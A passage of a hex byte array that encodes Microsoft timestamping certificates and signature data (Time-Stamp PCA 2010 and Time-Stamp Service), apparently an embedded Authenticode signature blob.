0x24, 0x60, 0x32, 0x58, 0x60, 0x46, 0xF2, 0x58, 0x47, 0x86, 0x32, 0x84, 0x1E, 0x74, 0x61, 0x67, 0x91, 0x5F, 0x81, 0x54, 0xB1, 0xCF, 0x93, 0x4C, 0x92, 0xC1, 0xC4, 0xA6, 0x5D, 0xD1, 0x61, 0x13, 0x6E, 0x28, 0xC6, 0x1A, 0xF9, 0x86, 0x80, 0xBB, 0xDF, 0x61, 0xFC, 0x46, 0xC1, 0x27, 0x1D, 0x24, 0x67, 0x12, 0x72, 0x1A, 0x21, 0x8A, 0xAF, 0x4B, 0x64, 0x89, 0x50, 0x62, 0xB1, 0x5D, 0xFD, 0x77, 0x1F, 0x3D, 0xF0, 0x57, 0x75, 0xAC, 0xBD, 0x8A, 0x42, 0x4D, 0x40, 0x51, 0xD1, 0x0F, 0x9C, 0x06, 0x3E, 0x67, 0x7F, 0xF5, 0x66, 0xC0, 0x03, 0x96, 0x44, 0x7E, 0xEF, 0xD0, 0x4B, 0xFD, 0x6E, 0xE5, 0x9A, 0xCA, 0xB1, 0xA8, 0xF2, 0x7A, 0x2A, 0x0A, 0x31, 0xF0, 0xDA, 0x4E, 0x06, 0x91, 0xB6, 0x88, 0x08, 0x35, 0xE8, 0x78, 0x1C, 0xB0, 0xE9, 0x99, 0xCD, 0x3C, 0xE7, 0x2F, 0x44, 0xBA, 0xA7, 0xF4, 0xDC, 0x64, 0xBD, 0xA4, 0x01, 0xC1, 0x20, 0x09, 0x93, 0x78, 0xCD, 0xFC, 0xBC, 0xC0, 0xC9, 0x44, 0x5D, 0x5E, 0x16, 0x9C, 0x01, 0x05, 0x4F, 0x22, 0x4D, 0x02, 0x03, 0x01, 0x00, 0x01, 0xA3, 0x82, 0x01, 0xE6, 0x30, 0x82, 0x01, 0xE2, 0x30, 0x10, 0x06, 0x09, 0x2B, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x15, 0x01, 0x04, 0x03, 0x02, 0x01, 0x00, 0x30, 0x1D, 0x06, 0x03, 0x55, 0x1D, 0x0E, 0x04, 0x16, 0x04, 0x14, 0xD5, 0x63, 0x3A, 0x5C, 0x8A, 0x31, 0x90, 0xF3, 0x43, 0x7B, 0x7C, 0x46, 0x1B, 0xC5, 0x33, 0x68, 0x5A, 0x85, 0x6D, 0x55, 0x30, 0x19, 0x06, 0x09, 0x2B, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x14, 0x02, 0x04, 0x0C, 0x1E, 0x0A, 0x00, 0x53, 0x00, 0x75, 0x00, 0x62, 0x00, 0x43, 0x00, 0x41, 0x30, 0x0B, 0x06, 0x03, 0x55, 0x1D, 0x0F, 0x04, 0x04, 0x03, 0x02, 0x01, 0x86, 0x30, 0x0F, 0x06, 0x03, 0x55, 0x1D, 0x13, 0x01, 0x01, 0xFF, 0x04, 0x05, 0x30, 0x03, 0x01, 0x01, 0xFF, 0x30, 0x1F, 0x06, 0x03, 0x55, 0x1D, 0x23, 0x04, 0x18, 0x30, 0x16, 0x80, 0x14, 0xD5, 0xF6, 0x56, 0xCB, 0x8F, 0xE8, 0xA2, 0x5C, 0x62, 0x68, 0xD1, 0x3D, 0x94, 0x90, 0x5B, 0xD7, 0xCE, 0x9A, 0x18, 0xC4, 0x30, 0x56, 0x06, 0x03, 0x55, 0x1D, 0x1F, 0x04, 0x4F, 0x30, 0x4D, 0x30, 0x4B, 0xA0, 0x49, 0xA0, 0x47, 0x86, 0x45, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x63, 0x72, 0x6C, 0x2E, 0x6D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x70, 0x6B, 0x69, 0x2F, 0x63, 0x72, 0x6C, 0x2F, 0x70, 0x72, 0x6F, 0x64, 0x75, 0x63, 0x74, 0x73, 0x2F, 0x4D, 0x69, 0x63, 0x52, 0x6F, 0x6F, 0x43, 0x65, 0x72, 0x41, 0x75, 0x74, 0x5F, 0x32, 0x30, 0x31, 0x30, 0x2D, 0x30, 0x36, 0x2D, 0x32, 0x33, 0x2E, 0x63, 0x72, 0x6C, 0x30, 0x5A, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x01, 0x01, 0x04, 0x4E, 0x30, 0x4C, 0x30, 0x4A, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x30, 0x02, 0x86, 0x3E, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x77, 0x77, 0x77, 0x2E, 0x6D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x70, 0x6B, 0x69, 0x2F, 0x63, 0x65, 0x72, 0x74, 0x73, 0x2F, 0x4D, 0x69, 0x63, 0x52, 0x6F, 0x6F, 0x43, 0x65, 0x72, 0x41, 0x75, 0x74, 0x5F, 0x32, 0x30, 0x31, 0x30, 0x2D, 0x30, 0x36, 0x2D, 0x32, 0x33, 0x2E, 0x63, 0x72, 0x74, 0x30, 0x81, 0xA0, 0x06, 0x03, 0x55, 0x1D, 0x20, 0x01, 0x01, 0xFF, 0x04, 0x81, 0x95, 0x30, 0x81, 0x92, 0x30, 0x81, 0x8F, 0x06, 0x09, 0x2B, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x2E, 0x03, 0x30, 0x81, 0x81, 0x30, 0x3D, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x02, 0x01, 0x16, 0x31, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x77, 0x77, 0x77, 0x2E, 0x6D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x50, 0x4B, 0x49, 0x2F, 0x64, 0x6F, 0x63, 0x73, 0x2F, 0x43, 0x50, 0x53, 0x2F, 0x64, 0x65, 0x66, 0x61, 0x75, 0x6C, 0x74, 0x2E, 0x68, 0x74, 0x6D, 0x30, 0x40, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x02, 0x02, 0x30, 0x34, 0x1E, 0x32, 0x20, 0x1D, 0x00, 0x4C, 0x00, 0x65, 0x00, 0x67, 0x00, 0x61, 0x00, 0x6C, 0x00, 0x5F, 0x00, 0x50, 0x00, 0x6F, 0x00, 0x6C, 0x00, 0x69, 0x00, 0x63, 0x00, 0x79, 0x00, 0x5F, 0x00, 0x53, 0x00, 0x74, 0x00, 0x61, 0x00, 0x74, 0x00, 0x65, 0x00, 0x6D, 0x00, 0x65, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x2E, 0x20, 0x1D, 0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x0B, 0x05, 0x00, 0x03, 0x82, 0x02, 0x01, 0x00, 0x07, 0xE6, 0x88, 0x51, 0x0D, 0xE2, 0xC6, 0xE0, 0x98, 0x3F, 0x81, 0x71, 0x03, 0x3D, 0x9D, 0xA3, 0xA1, 0x21, 0x6F, 0xB3, 0xEB, 0xA6, 0xCC, 0xF5, 0x31, 0xBE, 0xCF, 0x05, 0xE2, 0xA9, 0xFE, 0xFA, 0x57, 0x6D, 0x19, 0x30, 0xB3, 0xC2, 0xC5, 0x66, 0xC9, 0x6A, 0xDF, 0xF5, 0xE7, 0xF0, 0x78, 0xBD, 0xC7, 0xA8, 0x9E, 0x25, 0xE3, 0xF9, 0xBC, 0xED, 0x6B, 0x54, 0x57, 0x08, 0x2B, 0x51, 0x82, 0x44, 0x12, 0xFB, 0xB9, 0x53, 0x8C, 0xCC, 0xF4, 0x60, 0x12, 0x8A, 0x76, 0xCC, 0x40, 0x40, 0x41, 0x9B, 0xDC, 0x5C, 0x17, 0xFF, 0x5C, 0xF9, 0x5E, 0x17, 0x35, 0x98, 0x24, 0x56, 0x4B, 0x74, 0xEF, 0x42, 0x10, 0xC8, 0xAF, 0xBF, 0x7F, 0xC6, 0x7F, 0xF2, 0x37, 0x7D, 0x5A, 0x3F, 0x1C, 0xF2, 0x99, 0x79, 0x4A, 0x91, 0x52, 0x00, 0xAF, 0x38, 0x0F, 0x17, 0xF5, 0x2F, 0x79, 0x81, 0x65, 0xD9, 0xA9, 0xB5, 0x6B, 0xE4, 0xC7, 0xCE, 0xF6, 0xCA, 0x7A, 0x00, 0x6F, 0x4B, 0x30, 0x44, 0x24, 0x22, 0x3C, 0xCF, 0xED, 0x03, 0xA5, 0x96, 0x8F, 0x59, 0x29, 0xBC, 0xB6, 0xFD, 0x04, 0xE1, 0x70, 0x9F, 0x32, 0x4A, 0x27, 0xFD, 0x55, 0xAF, 0x2F, 0xFE, 0xB6, 0xE5, 0x8E, 0x33, 0xBB, 0x62, 0x5F, 0x9A, 0xDB, 0x57, 0x40, 0xE9, 0xF1, 0xCE, 0x99, 0x66, 0x90, 0x8C, 0xFF, 0x6A, 0x62, 0x7F, 0xDD, 0xC5, 0x4A, 0x0B, 0x91, 0x26, 0xE2, 0x39, 0xEC, 0x19, 0x4A, 0x71, 0x63, 0x9D, 0x7B, 0x21, 0x6D, 0xC3, 0x9C, 0xA3, 0xA2, 0x3C, 0xFA, 0x7F, 0x7D, 0x96, 0x6A, 0x90, 0x78, 0xA6, 0x6D, 0xD2, 0xE1, 0x9C, 0xF9, 0x1D, 0xFC, 0x38, 0xD8, 0x94, 0xF4, 0xC6, 0xA5, 0x0A, 0x96, 0x86, 0xA4, 0xBD, 0x9E, 0x1A, 0xAE, 0x04, 0x42, 0x83, 0xB8, 0xB5, 0x80, 0x9B, 0x22, 0x38, 0x20, 0xB5, 0x25, 0xE5, 0x64, 0xEC, 0xF7, 0xF4, 0xBF, 0x7E, 0x63, 0x59, 0x25, 0x0F, 0x7A, 0x2E, 0x39, 0x57, 0x76, 0xA2, 0x71, 0xAA, 0x06, 0x8A, 0x0F, 0x89, 0x16, 0xBA, 0x61, 0xA7, 0x11, 0xCB, 0x9A, 0xD8, 0x0E, 0x47, 0x9A, 0x80, 0xC5, 0xD0, 0xCD, 0xA7, 0xD0, 0xEF, 0x7D, 0x83, 0xF0, 0xE1, 0x3B, 0x71, 0x09, 0xDF, 0x5D, 0x74, 0x98, 0x22, 0x08, 0x61, 0xDA, 0xB0, 0x50, 0x1E, 0x6F, 0xBD, 0xF1, 0xE1, 0x00, 0xDF, 0xE7, 0x31, 0x07, 0xA4, 0x93, 0x3A, 0xF7, 0x65, 0x47, 0x78, 0xE8, 0xF8, 0xA8, 0x48, 0xAB, 0xF7, 0xDE, 0x72, 0x7E, 0x61, 0x6B, 0x6F, 0x77, 0xA9, 0x81, 0xCB, 0xA7, 0x09, 0xAC, 0x39, 0xBB, 0xEC, 0xC6, 0xCB, 0xD8, 0x82, 0xB4, 0x72, 0xCD, 0x1D, 0xF4, 0xB8, 0x85, 0x01, 0x1E, 0x80, 0xFB, 0x1B, 0x89, 0x2A, 0x54, 0x39, 0xB2, 0x5B, 0xDA, 0xC8, 0x0D, 0x55, 0x99, 0x7A, 0x87, 0x73, 0x3B, 0x08, 0xE6, 0x98, 0x2D, 0xEA, 0x8D, 0xE0, 0x33, 0x2E, 0x12, 0x29, 0xF5, 0xC0, 0x2F, 0x54, 0x27, 0x21, 0xF7, 0xC8, 0xAC, 0x4E, 0xDA, 0x28, 0xB8, 0xB1, 0xA9, 0xDB, 0x96, 0xB2, 0xA7, 0x42, 0xA2, 0xC9, 0xCF, 0x19, 0x41, 0x4D, 0xE0, 0x86, 0xF9, 0x2A, 0x9A, 0xA3, 0x11, 0x66, 0x30, 0xD3, 0xBB, 0x74, 0x32, 0x4B, 0xDF, 0x63, 0x7B, 0xF5, 0x99, 0x8A, 0x2F, 0x1B, 0xC7, 0x21, 0xAF, 0x59, 0xB5, 0xAE, 0xDC, 0x44, 0x3C, 0x97, 0x50, 0x71, 0xD7, 0xA1, 0xD2, 0xC5, 0x55, 0xE3, 0x69, 0xDE, 0x57, 0xC1, 0xD1, 0xDE, 0x30, 0xC0, 0xFD, 0xCC, 0xE6, 0x4D, 0xFB, 0x0D, 0xBF, 0x5D, 0x4F, 0xE9, 0x9D, 0x1E, 0x19, 0x38, 0x2F, 0xBC, 0xCF, 0x58, 0x05, 0x2E, 0xEF, 0x0D, 0xA0, 0x50, 0x35, 0xDA, 0xEF, 0x09, 0x27, 0x1C, 0xD5, 0xB3, 0x7E, 0x35, 0x1E, 0x08, 0xBA, 0xDA, 0x36, 0xDB, 0xD3, 0x5F, 0x8F, 0xDE, 0x74, 0x88, 0x49, 0x12, 0x30, 0x82, 0x04, 0xDA, 0x30, 0x82, 0x03, 0xC2, 0xA0, 0x03, 0x02, 0x01, 0x02, 0x02, 0x13, 0x33, 0x00, 0x00, 0x00, 0xB1, 0x71, 0x13, 0x79, 0xDF, 0x75, 0xF6, 0x35, 0xC8, 0x00, 0x00, 0x00, 0x00, 0x00, 0xB1, 0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x0B, 0x05, 0x00, 0x30, 0x7C, 0x31, 0x0B, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04, 0x06, 0x13, 0x02, 0x55, 0x53, 0x31, 0x13, 0x30, 0x11, 0x06, 0x03, 0x55, 0x04, 0x08, 0x13, 0x0A, 0x57, 0x61, 0x73, 0x68, 0x69, 0x6E, 0x67, 0x74, 0x6F, 0x6E, 0x31, 0x10, 0x30, 0x0E, 0x06, 0x03, 0x55, 0x04, 0x07, 0x13, 0x07, 0x52, 0x65, 0x64, 0x6D, 0x6F, 0x6E, 0x64, 0x31, 0x1E, 0x30, 0x1C, 0x06, 0x03, 0x55, 0x04, 0x0A, 0x13, 0x15, 0x4D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x20, 0x43, 0x6F, 0x72, 0x70, 0x6F, 0x72, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x31, 0x26, 0x30, 0x24, 0x06, 0x03, 0x55, 0x04, 0x03, 0x13, 0x1D, 0x4D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x20, 0x54, 0x69, 0x6D, 0x65, 0x2D, 0x53, 0x74, 0x61, 0x6D, 0x70, 0x20, 0x50, 0x43, 0x41, 0x20, 0x32, 0x30, 0x31, 0x30, 0x30, 0x1E, 0x17, 0x0D, 0x31, 0x36, 0x30, 0x39, 0x30, 0x37, 0x31, 0x37, 0x35, 0x36, 0x35, 0x37, 0x5A, 0x17, 0x0D, 0x31, 0x38, 0x30, 0x39, 0x30, 0x37, 0x31, 0x37, 0x35, 0x36, 0x35, 0x37, 0x5A, 0x30, 0x81, 0xB3, 0x31, 0x0B, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04, 0x06, 0x13, 0x02, 0x55, 0x53, 0x31, 0x13, 0x30, 0x11, 0x06, 0x03, 0x55, 0x04, 0x08, 0x13, 0x0A, 0x57, 0x61, 0x73, 0x68, 0x69, 0x6E, 0x67, 0x74, 0x6F, 0x6E, 0x31, 0x10, 0x30, 0x0E, 0x06, 0x03, 0x55, 0x04, 0x07, 0x13, 0x07, 0x52, 0x65, 0x64, 0x6D, 0x6F, 0x6E, 0x64, 0x31, 0x1E, 0x30, 0x1C, 0x06, 0x03, 0x55, 0x04, 0x0A, 0x13, 0x15, 0x4D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x20, 0x43, 0x6F, 0x72, 0x70, 0x6F, 0x72, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x31, 0x0D, 0x30, 0x0B, 0x06, 0x03, 0x55, 0x04, 0x0B, 0x13, 0x04, 0x4D, 0x4F, 0x50, 0x52, 0x31, 0x27, 0x30, 0x25, 0x06, 0x03, 0x55, 0x04, 0x0B, 0x13, 0x1E, 0x6E, 0x43, 0x69, 0x70, 0x68, 0x65, 0x72, 0x20, 0x44, 0x53, 0x45, 0x20, 0x45, 0x53, 0x4E, 0x3A, 0x42, 0x31, 0x42, 0x37, 0x2D, 0x46, 0x36, 0x37, 0x46, 0x2D, 0x46, 0x45, 0x43, 0x32, 0x31, 0x25, 0x30, 0x23, 0x06, 0x03, 0x55, 0x04, 0x03, 0x13, 0x1C, 0x4D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x20, 0x54, 0x69, 0x6D, 0x65, 0x2D, 0x53, 0x74, 0x61, 0x6D, 0x70, 0x20, 0x53, 0x65, 0x72, 0x76, 0x69, 0x63, 0x65, 0x30, 0x82, 0x01, 0x22, 0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x01, 0x05, 0x00, 0x03, 0x82, 0x01, 0x0F, 0x00, 0x30, 0x82, 0x01, 0x0A, 0x02, 0x82, 0x01, 0x01, 0x00, 0xAA, 0xA4, 0x24, 0x94, 0x6D, 0x58, 0xD6, 0x5B, 0xBC, 0xA1, 0xBD, 0x0F, 0xED, 0xD7, 0xAE, 0x9A, 0xE4, 0x67, 0xE0, 0x9B, 0xD1, 0x8B, 0x61, 0x84, 0xAE, 0x62, 0xBD, 0xE2, 0xF8, 0x1B, 0x9D, 0x63, 0xE6, 0x77, 0x48, 0xFF, 0xF5, 0xAA, 0xC0, 0xEF, 0x9D, 0xFD, 0x1C, 0x3D, 0x5D, 0xA4, 0x6D, 0x6E, 0x85, 0x86, 0xE6, 0x9C, 0x0C, 0x5C, 0xFA, 0xAB, 0x2E, 0xBC, 0xC3, 0x34, 0x7E, 0x91, 0x2F, 0xB6, 0xD4, 0xCA, 0xE2, 0x56, 0x52, 0x53, 0xBB, 0x2C, 0xE6, 0xB2, 0x5F, 0x5A, 0x66, 0xC5, 0x9F, 0xF2, 0x7C, 0x91, 0x21, 0x88, 0xF0, 0xAF, 0x62, 0x05, 0xA0, 0x7A, 0x85, 0x09, 0x09, 0xB8, 0x85, 0xF8, 0xB2, 0x2F, 0x69, 0xA4, 0xDA, 0xFD, 0x47, 0x7A, 0x19, 0x23, 0x71, 0xDB, 0x27, 0xFC, 0x91, 0x90, 0xA5, 0x0F, 0x93, 0x88, 0x68, 0xCE, 0x96, 0x3A, 0x0A, 0x47, 0xA1, 0x45, 0xCD, 0x3F, 0x65, 0xFB, 0xBA, 0xB5, 0x08, 0xB2, 0xA8, 0x8E, 0xE6, 0x0A, 0x55, 0xD8, 0x65, 0x35, 0xE3, 0xC3, 0xEA, 0xCB, 0xB2, 0x1D, 0xFF, 0x81, 0xD0, 0x6F, 0x60, 0x37, 0x77, 0xF3, 0x31, 0x41, 0x96, 0x56, 0x9F, 0xFB, 0x7B, 0xA2, 0x98, 0xA4, 0x20, 0x51, 0x35, 0xC6, 0x8D, 0xB2, 0x9F, 0xA9, 0x96, 0x64, 0xDE, 0xD1, 0x14, 0xDE, 0x26, 0xD6, 0x54, 0xF5, 0x31, 0x02, 0x69, 0xB1, 0x94, 0x6D, 0xEC, 0x59, 0x39, 0x57, 0x99, 0x4D, 0xF5, 0x7C, 0x2C, 0x3F, 0xE9, 0x35, 0x73, 0x1A, 0x0D, 0xB9, 0xD6, 0x5A, 0xBE, 0x43, 0x8E, 0x8E, 0x8D, 0xB7, 0x87, 0xF6, 0xF0, 0x76, 0x4C, 0xE7, 0x2A, 0x12, 0xCA, 0x38, 0x35, 0xA8, 0xB7, 0x27, 0x50, 0x9D, 0x30, 0x06, 0x14, 0x76, 0x57, 0xA5, 0x55, 0x5B, 0x60, 0x41, 0xD2, 0x31, 0xFD, 0xCF, 0xB9, 0x1E, 0xFA, 0xF0, 0xD1, 0x8E, 0x96, 0xEE, 0xE1, 0x81, 0x01, 0x69, 0xD6, 0xE7, 0x02, 0x03, 0x01, 0x00, 0x01, 0xA3, 0x82, 0x01, 0x1B, 0x30, 0x82, 0x01, 0x17, 0x30, 0x1D, 0x06, 0x03, 0x55, 0x1D, 0x0E, 0x04, 0x16, 0x04, 0x14, 0x4E, 0x57, 0x3D, 0xF7, 0x8B, 0x2E, 0x14, 0x4B, 0x57, 0xB2, 0xFC, 0x22, 0x5E, 0xD3, 0xCF, 0xB7, 0x27, 0x44, 0x10, 0x3B, 0x30, 0x1F, 0x06, 0x03, 0x55, 0x1D, 0x23, 0x04, 0x18, 0x30, 0x16, 0x80, 0x14, 0xD5, 0x63, 0x3A, 0x5C, 0x8A, 0x31, 0x90, 0xF3, 0x43, 0x7B, 0x7C, 0x46, 0x1B, 0xC5, 0x33, 0x68, 0x5A, 0x85, 0x6D, 0x55, 0x30, 0x56, 0x06, 0x03, 0x55, 0x1D, 0x1F, 0x04, 0x4F, 0x30, 0x4D, 0x30, 0x4B, 0xA0, 0x49, 0xA0, 0x47, 0x86, 0x45, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x63, 0x72, 0x6C, 0x2E, 0x6D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x70, 0x6B, 0x69, 0x2F, 0x63, 0x72, 0x6C, 0x2F, 0x70, 0x72, 0x6F, 0x64, 0x75, 0x63, 0x74, 0x73, 0x2F, 0x4D, 0x69, 0x63, 0x54, 0x69, 0x6D, 0x53, 0x74, 0x61, 0x50, 0x43, 0x41, 0x5F, 0x32, 0x30, 0x31, 0x30, 0x2D, 0x30, 0x37, 0x2D, 0x30, 0x31, 0x2E, 0x63, 0x72, 0x6C, 0x30, 0x5A, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x01, 0x01, 0x04, 0x4E, 0x30, 0x4C, 0x30, 0x4A, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x30, 0x02, 0x86, 0x3E, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x77, 0x77, 0x77, 0x2E, 0x6D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x70, 0x6B, 0x69, 0x2F, 0x63, 0x65, 0x72, 0x74, 0x73, 0x2F, 0x4D, 0x69, 0x63, 0x54, 0x69, 0x6D, 0x53, 0x74, 0x61, 0x50, 0x43, 0x41, 0x5F, 0x32, 0x30, 0x31, 0x30, 0x2D, 0x30, 0x37, 0x2D, 0x30, 0x31, 0x2E, 0x63, 0x72, 0x74, 0x30, 0x0C, 0x06, 0x03, 0x55, 0x1D, 0x13, 0x01, 0x01, 0xFF, 0x04, 0x02, 0x30, 0x00, 0x30, 0x13, 0x06, 0x03, 0x55, 0x1D, 0x25, 0x04, 0x0C, 0x30, 0x0A, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x03, 0x08, 0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x0B, 0x05, 0x00, 0x03, 0x82, 0x01, 0x01, 0x00, 0x73, 0xEE, 0x8D, 0xFB, 0xB4, 0x5B, 0xC3, 0xC1, 0x4E, 0x98, 0xDF, 0x61, 0xA3, 0xEB, 0x00, 0xA2, 0x01, 0x2C, 0xA7, 0x25, 0x8D, 0x3E, 0x3E, 0x62, 0x75, 0x9B, 0x6E, 0x01, 0xAF, 0x99, 0x75, 0x3C, 0x3A, 0xF2, 0x14, 0x0C, 0x19, 0x24, 0xBF, 0xC8, 0x0D, 0x18, 0x61, 0xD1, 0x3B, 0x90, 0xD2, 0xC9, 0x26, 0x82, 0x01, 0x12, 0x33, 0x82, 0x7D, 0xB2, 0x22, 0x17, 0x80, 0xAA, 0x1E, 0x86, 0xC0, 0xCD, 0xB2, 0x2A, 0xB7, 0xDB, 0xE1, 0xE5, 0x42, 0x60, 0xF7, 0xB5, 0x09, 0x39, 0x42, 0xB1, 0xE4, 0xB9, 0x4C, 0xEB, 0xFE, 0x4E, 0x7F, 0xFD, 0xE6, 0x65, 0xE3, 0xF8, 0xDC, 0x53, 0xAA, 0xFB, 0x8D, 0x9A, 0xB8, 0x60, 0x09, 0x5A, 0xF4, 0x09, 0x0E, 0xDB, 0xDF, 0x1A, 0x0A, 0x73, 0x00, 0xDC, 0x41, 0xB8, 0x3B, 0x4E, 0x67, 0xAB, 0x0E, 0x06, 0xC8, 0xBF, 0x69, 0x3B, 0x70, 0x4A, 0x9B, 0x61, 0xB5, 0x3F, 0x07, 0x73, 0x2D, 0x49, 0x7F, 0x19, 0x8E, 0x37, 0xF4, 0x66, 0x78, 0x1D, 0x2A, 0x85, 0xF4, 0x25, 0x89, 0x00, 0x10, 0x36, 0xD9, 0x72, 0x13, 0xAB, 0x46, 0x25, 0x2D, 0x0C, 0x92, 0x2D, 0x7A, 0x03, 0xCA, 0x64, 0xF7, 0xFA, 0x0A, 0x37, 0x87, 0x62, 0x3A, 0xE6, 0x2B, 0x0B, 0xD3, 0x39, 0x50, 0xB3, 0xBF, 0x79, 0x56, 0xD2, 0xEC, 0xA1, 0xD7, 0x26, 0xFF, 0x38, 0x37, 0x91, 0x1F, 0xE5, 0x6A, 0x10, 0xD4, 0x87, 0x09, 0xBA, 0x05, 0x88, 0x48, 0xAA, 0xF4, 0xAA, 0x4A, 0x30, 0xEA, 0x5E, 0x93, 0x55, 0x6F, 0x42, 0x19, 0x88, 0xD8, 0xA6, 0xD3, 0x95, 0x1B, 0xCA, 0xF3, 0xAF, 0x60, 0x8F, 0x53, 0x70, 0xB9, 0x41, 0xC7, 0xF1, 0xCD, 0xD6, 0x5E, 0xEE, 0x00, 0xD1, 0x7D, 0x7E, 0x08, 0x19, 0x94, 0xF2, 0xDD, 0x20, 0xBD, 0xDF, 0xDF, 0x16, 0x54, 0x2F, 0xC3, 0x4E, 0x2F, 0x78, 0xA5, 0xA1, 0xF7, 0xCE, 0xA1, 0x82, 0x03, 0x76, 0x30, 0x82, 0x02, 0x5E, 0x02, 0x01, 0x01, 0x30, 0x81, 0xE3, 0xA1, 0x81, 0xB9, 0xA4, 0x81, 0xB6, 0x30, 0x81, 0xB3, 0x31, 0x0B, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04, 0x06, 0x13, 0x02, 0x55, 0x53, 0x31, 0x13, 0x30, 0x11, 0x06, 0x03, 0x55, 0x04, 0x08, 0x13, 0x0A, 0x57, 0x61, 0x73, 0x68, 0x69, 0x6E, 0x67, 0x74, 0x6F, 0x6E, 0x31, 0x10, 0x30, 0x0E, 0x06, 0x03, 0x55, 0x04, 0x07, 0x13, 0x07, 0x52, 0x65, 0x64, 0x6D, 0x6F, 0x6E, 0x64, 0x31, 0x1E, 0x30, 0x1C, 0x06, 0x03, 0x55, 0x04, 0x0A, 0x13, 0x15, 0x4D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x20, 0x43, 0x6F, 0x72, 0x70, 0x6F, 0x72, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x31, 0x0D, 0x30, 0x0B, 0x06, 0x03, 0x55, 0x04, 0x0B, 0x13, 0x04, 0x4D, 0x4F, 0x50, 0x52, 0x31, 0x27, 0x30, 0x25, 0x06, 0x03, 0x55, 0x04, 0x0B, 0x13, 0x1E, 0x6E, 0x43, 0x69, 0x70, 0x68, 0x65, 0x72, 0x20, 0x44, 0x53, 0x45, 0x20, 0x45, 0x53, 0x4E, 0x3A, 0x42, 0x31, 0x42, 0x37, 0x2D, 0x46, 0x36, 0x37, 0x46, 0x2D, 0x46, 0x45, 0x43, 0x32, 0x31, 0x25, 0x30, 0x23, 0x06, 0x03, 0x55, 0x04, 0x03, 0x13, 0x1C, 0x4D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x20, 0x54, 0x69, 0x6D, 0x65, 0x2D, 0x53, 0x74, 0x61, 0x6D, 0x70, 0x20, 0x53, 0x65, 0x72, 0x76, 0x69, 0x63, 0x65, 0xA2, 0x25, 0x0A, 0x01, 0x01, 0x30, 0x09, 0x06, 0x05, 0x2B, 0x0E, 0x03, 0x02, 0x1A, 0x05, 0x00, 0x03, 0x15, 0x00, 0x3A, 0xBA, 0xDF, 0x93, 0x28, 0x65, 0xE4, 0x7A, 0xD3, 0xE7, 0xA3, 0xF6, 0xE2, 0xA7, 0x44, 0x6E, 0x58, 0xAA, 0x53, 0xD2, 0xA0, 0x81, 0xC2, 0x30, 0x81, 0xBF, 0xA4, 0x81, 0xBC, 0x30, 0x81, 0xB9, 0x31, 0x0B, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04, 0x06, 0x13, 0x02, 0x55, 0x53, 0x31, 0x13, 0x30, 0x11, 0x06, 0x03, 0x55, 0x04, 0x08, 0x13, 0x0A, 0x57, 0x61, 0x73, 0x68, 0x69, 0x6E, 0x67, 0x74, 0x6F, 0x6E, 0x31, 0x10, 0x30, 0x0E, 0x06, 0x03, 0x55, 0x04, 0x07, 0x13, 0x07, 0x52, 0x65, 0x64, 0x6D, 0x6F, 0x6E, 0x64, 0x31, 0x1E, 0x30, 0x1C, 0x06, 0x03, 0x55, 0x04, 0x0A, 0x13, 0x15, 0x4D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x20, 0x43, 0x6F, 0x72, 0x70, 0x6F, 0x72, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x31, 0x0D, 0x30, 0x0B, 0x06, 